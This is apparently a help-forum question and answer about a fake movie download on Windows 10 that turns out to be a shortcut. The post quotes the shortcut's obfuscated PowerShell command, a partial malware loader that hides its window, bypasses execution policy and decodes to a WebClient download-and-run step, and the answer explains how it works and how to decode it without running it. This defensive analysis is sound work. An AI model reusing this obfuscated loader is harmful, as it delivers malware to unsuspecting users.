In Windows 10 I downloaded this file that I thought was a movie but it was a short-cut with a size of 700MB
I see that the target is this
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
And it was set to start at
%SYSTEMROOT%\System32\WindowsPowerShell\v1.0
What does it do?
It's a malware loader.
It executes a powershell code beginning with New-Object System.N... (hidden in the numbers), which in full content is New-Object System.Net.WebClient, that will further be used to download and execute the actual malware from the URL that is also hidden in the further numbers of the obfuscated code.
If you have already clicked the link, then you're likely already infected, unless the URL was already taken down.
You may try to paste your line to notepad and then delete everything before ( -JoiN( (, copy the remaining part (beginning with ( -JoiN( (...) and paste it to PowerShell window. It will disclose the obfuscated PowerShell code that would normally be executed by the preceding $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression.
